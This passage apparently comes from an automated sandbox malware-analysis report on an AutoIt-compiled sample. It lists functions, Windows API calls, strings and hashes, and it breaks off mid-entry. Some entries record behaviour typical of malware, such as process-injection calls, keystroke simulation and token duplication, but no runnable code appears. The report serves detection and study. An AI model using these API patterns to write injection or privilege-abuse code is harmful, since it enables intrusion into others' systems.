Opcode Fuzzy Hash: 5180d652361b3cd958197e8ffd8e03be571e4319a4e0ffa88acb8b4b17c6826c
Instruction Fuzzy Hash: A4F09671821B159AD7116F7598097AEB6A06F41374F20C249E42CAB1D1CFFC49515F52

Function 0147CC45 Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 0147D403
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 0147D499
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0147D4BB

Memory Dump Source

Source File: 00000000.00000002.2057399383.000000000147B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0147B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_147b000_BgroUcYHpy.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 7bc2eb71131a5ca0d961fb64b4ce1da28befc4a8e94ed8bda1bc50d134690387
Instruction ID: d72f599c4101c03c0cb1ade5ec790b1538ea87a397dd6c7bc8c79d904e0a1dc1
Opcode Fuzzy Hash: 7bc2eb71131a5ca0d961fb64b4ce1da28befc4a8e94ed8bda1bc50d134690387
Instruction Fuzzy Hash: 2F12CE24E24658C6EB24DF64D8507DEB232EF68300F1094E9910DEB7A5E77A4F81CF5A

Function 00270C08 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 00270CB7

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 17fc323251b9e008adee6123904f19aaf4202a7ebfecad3db6d15c6e327472f0
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 1131C370A10106DBC71ADF58C4C4A69FBA6FB59300B64C6AAE80ACB351D671EDE5DB80

Function 0028FCAC Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 0028FCB7

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: e0e92ff8d531179f3e53d3e616d04ffb37b77f46f6d5797841ad50c25af31c77
Instruction ID: ed55ee89bc1bae91a90d1f2af2b0b65a5f06aed5fcc0c39933ebe3c748651234
Opcode Fuzzy Hash: e0e92ff8d531179f3e53d3e616d04ffb37b77f46f6d5797841ad50c25af31c77
Instruction Fuzzy Hash: 30411774514341CFDB14DF14C484B1ABBE1BF49319F0989ACE99A8B762C332E859CF56

Function 00257B53 Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00257BB3

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 5bbb6a6db4c41ac72993fe4b49b36fc398c80b89a4af3cb61758aec611d30b51
Instruction ID: f61677337b3c77552a193081583f154a5e32235111f37260eea52790ccbe4b5c
Opcode Fuzzy Hash: 5bbb6a6db4c41ac72993fe4b49b36fc398c80b89a4af3cb61758aec611d30b51
Instruction Fuzzy Hash: 25213672A35A09EBDF10AF12F8417AA7BB8FB14351F22842FE846C5190EB7095F4CB05

Function 002706FE Relevance: 1.6, APIs: 1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb38f1e40c2d73bac2084b9b3cbe7e2f505631c201106345c54bdb1a4fc8cfaf
Instruction ID: 407a5add53f776c187e4358ec3bc1aa503b682b3aa3d3c8517815b80bc283b67
Opcode Fuzzy Hash: eb38f1e40c2d73bac2084b9b3cbe7e2f505631c201106345c54bdb1a4fc8cfaf
Instruction Fuzzy Hash: 492129354183D2AFC7228B3498665E5BFE5DF83311F0484DEECD84AC96D170685BC786

Function 00254DDD Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00254BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00254BEF

Part of subcall function 0027525B: __wfsopen.LIBCMT ref: 00275266

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,003152F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00254E0F

Part of subcall function 00254B6A: FreeLibrary.KERNEL32(00000000), ref: 00254BA4

Part of subcall function 00254C70: _memmove.LIBCMT ref: 00254CBA

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Library$Free$Load__wfsopen_memmove
String ID:
API String ID: 1396898556-0
Opcode ID: 94eb2913d1f9d8fd3974e6cb14ddd331cfdcacbabe0b61d3316d6b589dbdd243
Instruction ID: 2dfe0b25af9479f4b9f1fce8abf7ed96870326b056670d960efe9289d2a794f5
Opcode Fuzzy Hash: 94eb2913d1f9d8fd3974e6cb14ddd331cfdcacbabe0b61d3316d6b589dbdd243
Instruction Fuzzy Hash: 4A112731620205ABCF14BF70C817FADB7A4AF44709F108429FD42A71C1DAB09E699F58

Function 0028FD85 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 0028FD91

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 8d5c00cdd40f94cd3fbb2cf231bc56a906eda14ae2c7e5e560e240f4c228c945
Instruction ID: 3b6f9aca05205b4f3a862c5b574097ae597b0225b0302e673da0705e525589aa
Opcode Fuzzy Hash: 8d5c00cdd40f94cd3fbb2cf231bc56a906eda14ae2c7e5e560e240f4c228c945
Instruction Fuzzy Hash: 57213374928301DFCB14DF24C484B1ABBE1BF88316F048968F88A47722D731E868CF96

Function 00274863 Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 002748A6

Part of subcall function 00278B28: __getptd_noexit.LIBCMT ref: 00278B28

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: 142b017afd2e1069faf3f1a2163f165f47b2f7b1661fc3d17f42483eb3e0fd47
Instruction ID: c66ae17dfaee8bb5e75f32ef6b91162170b587048b91dfcd7be619df45cd0f18
Opcode Fuzzy Hash: 142b017afd2e1069faf3f1a2163f165f47b2f7b1661fc3d17f42483eb3e0fd47
Instruction Fuzzy Hash: E7F0AF3196160AEBDF12BFB48C0E7AE76A0AF00325F15C514F42C9A191CBB88971DF52

Function 00254E4A Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,003152F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00254E7E

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 277c205c536d7a83afe513ff66e6a7e52bd5c2d0bc1ac755a4f44b637e080448
Instruction ID: 5acac57712cc18ebbc95754a37aaeeb8bc06ceabf0c0cd67fafa083c882d6412
Opcode Fuzzy Hash: 277c205c536d7a83afe513ff66e6a7e52bd5c2d0bc1ac755a4f44b637e080448
Instruction Fuzzy Hash: 0AF03071521752CFCB34AF64E495816F7E1BF1432A320897EEADB82621C7719898DF44

Function 00270791 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 002707B0

Part of subcall function 00257BCC: _memmove.LIBCMT ref: 00257C06

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: LongNamePath_memmove
String ID:
API String ID: 2514874351-0
Opcode ID: c4f8f92a5f38371d9f34b3864653d9015a9891ac7fde5d656b9a390cbfa50b58
Instruction ID: 1a7903964399add20ed79df0f6c8ad3a07f14fc6b4019f766eb1a846db0b4032
Opcode Fuzzy Hash: c4f8f92a5f38371d9f34b3864653d9015a9891ac7fde5d656b9a390cbfa50b58
Instruction Fuzzy Hash: 4CE0CD3694512857C720E658AC0AFEA77DDDF887A1F0441F6FC0CD7248D9709C918AD4

Function 002B8E9F Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 002B8EC1

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
Instruction ID: 91f5e77f5d52853072b6942c9a679048746d84eb8c9d8dd630ed18b8e91c046c
Opcode Fuzzy Hash: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
Instruction Fuzzy Hash: 51E092B0114B045BD7388E24D840BE373E5AB05304F00081DF2AA83241EBA3B851CB59

Function 0027525B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 00275266

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: dc94ae87012001a0849aa80d4de30bd5f8c0cbfb24454f2bd023bace3df93e85
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: 9FB0927644020C77CE012A82EC02A497B199B41764F408020FF0C18162A6B3A6749A89

Function 0147DC48 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 0147DC59

Memory Dump Source

Source File: 00000000.00000002.2057399383.000000000147B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0147B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_147b000_BgroUcYHpy.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 93d3d904968e388d669744b9e586d408c795692eab8dddd8a9708480c81ff2df
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: D4E0E67494410DDFDB00DFF4D64D6ED7BB4EF04301F100261FD01D2280D6709D508A62

Non-executed Functions

Function 002DCABC Relevance: 75.9, APIs: 40, Strings: 3, Instructions: 632windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00252612: GetWindowLongW.USER32(?,000000EB), ref: 00252623

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 002DCB37
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 002DCB95
GetWindowLongW.USER32(?,000000F0), ref: 002DCBD6
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 002DCC00
SendMessageW.USER32 ref: 002DCC29
_wcsncpy.LIBCMT ref: 002DCC95
GetKeyState.USER32(00000011), ref: 002DCCB6
GetKeyState.USER32(00000009), ref: 002DCCC3
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 002DCCD9
GetKeyState.USER32(00000010), ref: 002DCCE3
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 002DCD0C
SendMessageW.USER32 ref: 002DCD33
SendMessageW.USER32(?,00001030,?,002DB348), ref: 002DCE37
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 002DCE4D
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 002DCE60
SetCapture.USER32(?), ref: 002DCE69
ClientToScreen.USER32(?,?), ref: 002DCECE
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 002DCEDB
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 002DCEF5
ReleaseCapture.USER32 ref: 002DCF00
GetCursorPos.USER32(?), ref: 002DCF3A
ScreenToClient.USER32(?,?), ref: 002DCF47
SendMessageW.USER32(?,00001012,00000000,?), ref: 002DCFA3
SendMessageW.USER32 ref: 002DCFD1
SendMessageW.USER32(?,00001111,00000000,?), ref: 002DD00E
SendMessageW.USER32 ref: 002DD03D
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 002DD05E
SendMessageW.USER32(?,0000110B,00000009,?), ref: 002DD06D
GetCursorPos.USER32(?), ref: 002DD08D
ScreenToClient.USER32(?,?), ref: 002DD09A
GetParent.USER32(?), ref: 002DD0BA
SendMessageW.USER32(?,00001012,00000000,?), ref: 002DD123
SendMessageW.USER32 ref: 002DD154
ClientToScreen.USER32(?,?), ref: 002DD1B2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 002DD1E2
SendMessageW.USER32(?,00001111,00000000,?), ref: 002DD20C
SendMessageW.USER32 ref: 002DD22F
ClientToScreen.USER32(?,?), ref: 002DD281
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 002DD2B5

Part of subcall function 002525DB: GetWindowLongW.USER32(?,000000EB), ref: 002525EC

GetWindowLongW.USER32(?,000000F0), ref: 002DD351

Strings

@GUI_DRAGID, xrefs: 002DCE9C
pb1, xrefs: 002DCEAF
F, xrefs: 002DD235

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F$pb1
API String ID: 3977979337-1404435443
Opcode ID: 6f76d8e2bbfa239703def1d30e44b9ded4baedd8135ce2e0a68c5ca60de572f5
Instruction ID: 825d299bc9d488ab46584d5db04e4bbe4b55eb929fe587f38adb150cb7ec028d
Opcode Fuzzy Hash: 6f76d8e2bbfa239703def1d30e44b9ded4baedd8135ce2e0a68c5ca60de572f5
Instruction Fuzzy Hash: 5442BA34624642AFD721CF28D848AAABBE5FF49314F24451BF696873A0C731DC64DF92

Function 00266F9E Relevance: 55.8, APIs: 19, Strings: 10, Instructions: 5018COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 002671C3
_memset.LIBCMT ref: 00267539
_memmove.LIBCMT ref: 002676AC

Strings

P\0, xrefs: 002A1AB8
\b(?<=\w), xrefs: 002A3773
[:<:]], xrefs: 00267479
[:>:]], xrefs: 00267492
3c&, xrefs: 002A23A0
_&, xrefs: 002A23CB
]0, xrefs: 002A1A22
\b(?=\w), xrefs: 002A3769
DEFINE, xrefs: 002A2103
Q\E, xrefs: 00267FCB

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: _memmove$_memset
String ID: ]0$3c&$DEFINE$P\0$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_&
API String ID: 1357608183-1122871721
Opcode ID: 808482b5a2fafea7e61267295d758db32bd3a5a40d3c3023c8ca992ddd51cda1
Instruction ID: 31f16b010830be6f1d6d6e8a2ce9c7827f5f8e8e21e9b68d181f6619136a4140
Opcode Fuzzy Hash: 808482b5a2fafea7e61267295d758db32bd3a5a40d3c3023c8ca992ddd51cda1
Instruction Fuzzy Hash: 1293B371E20216DFDB24CF58D8817ADB7B1FF49714F24816AE949EB281EB709D91CB40

Function 002548D7 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,?), ref: 002548DF
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0028D665
IsIconic.USER32(?), ref: 0028D66E
ShowWindow.USER32(?,00000009), ref: 0028D67B
SetForegroundWindow.USER32(?), ref: 0028D685
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0028D69B
GetCurrentThreadId.KERNEL32 ref: 0028D6A2
GetWindowThreadProcessId.USER32(?,00000000), ref: 0028D6AE
AttachThreadInput.USER32(?,00000000,00000001), ref: 0028D6BF
AttachThreadInput.USER32(?,00000000,00000001), ref: 0028D6C7
AttachThreadInput.USER32(00000000,?,00000001), ref: 0028D6CF
SetForegroundWindow.USER32(?), ref: 0028D6D2
MapVirtualKeyW.USER32(00000012,00000000), ref: 0028D6E7
keybd_event.USER32(00000012,00000000), ref: 0028D6F2
MapVirtualKeyW.USER32(00000012,00000000), ref: 0028D6FC
keybd_event.USER32(00000012,00000000), ref: 0028D701
MapVirtualKeyW.USER32(00000012,00000000), ref: 0028D70A
keybd_event.USER32(00000012,00000000), ref: 0028D70F
MapVirtualKeyW.USER32(00000012,00000000), ref: 0028D719
keybd_event.USER32(00000012,00000000), ref: 0028D71E
SetForegroundWindow.USER32(?), ref: 0028D721
AttachThreadInput.USER32(?,?,00000000), ref: 0028D748

Strings

Shell_TrayWnd, xrefs: 0028D660

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 8e9c938a1fa8dd764345261983afa1de6d23c9938dfd26b066caa52667f40cf3
Instruction ID: 541300d1ba30bb564c270efb74530801f0365635a4b740d3a36a2ccc681fc193
Opcode Fuzzy Hash: 8e9c938a1fa8dd764345261983afa1de6d23c9938dfd26b066caa52667f40cf3
Instruction Fuzzy Hash: BE31B375E91318BBEB202F61AC89F7F7F6CEB44B50F144026FA05EA1D1D6B05D10ABA4

Function 002A8310 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 002A87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 002A882B
Part of subcall function 002A87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 002A8858
Part of subcall function 002A87E1: GetLastError.KERNEL32 ref: 002A8865

_memset.LIBCMT ref: 002A8353
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 002A83A5
CloseHandle.KERNEL32(?), ref: 002A83B6
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 002A83CD
GetProcessWindowStation.USER32 ref: 002A83E6
SetProcessWindowStation.USER32(00000000), ref: 002A83F0
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 002A840A

Part of subcall function 002A81CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,002A8309), ref: 002A81E0
Part of subcall function 002A81CB: CloseHandle.KERNEL32(?,?,002A8309), ref: 002A81F2

Strings

default, xrefs: 002A8405
, xrefs: 002A8362
winsta0, xrefs: 002A83C8

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: 4eed4b692945bc9b6924cb2ca5504dceb853df1d249bc017e3ce7fd09e757316
Instruction ID: d5bb6cdd2c43a6a8e674b2768e031ede7f27ccddcee9d59bb09912094614b5a0
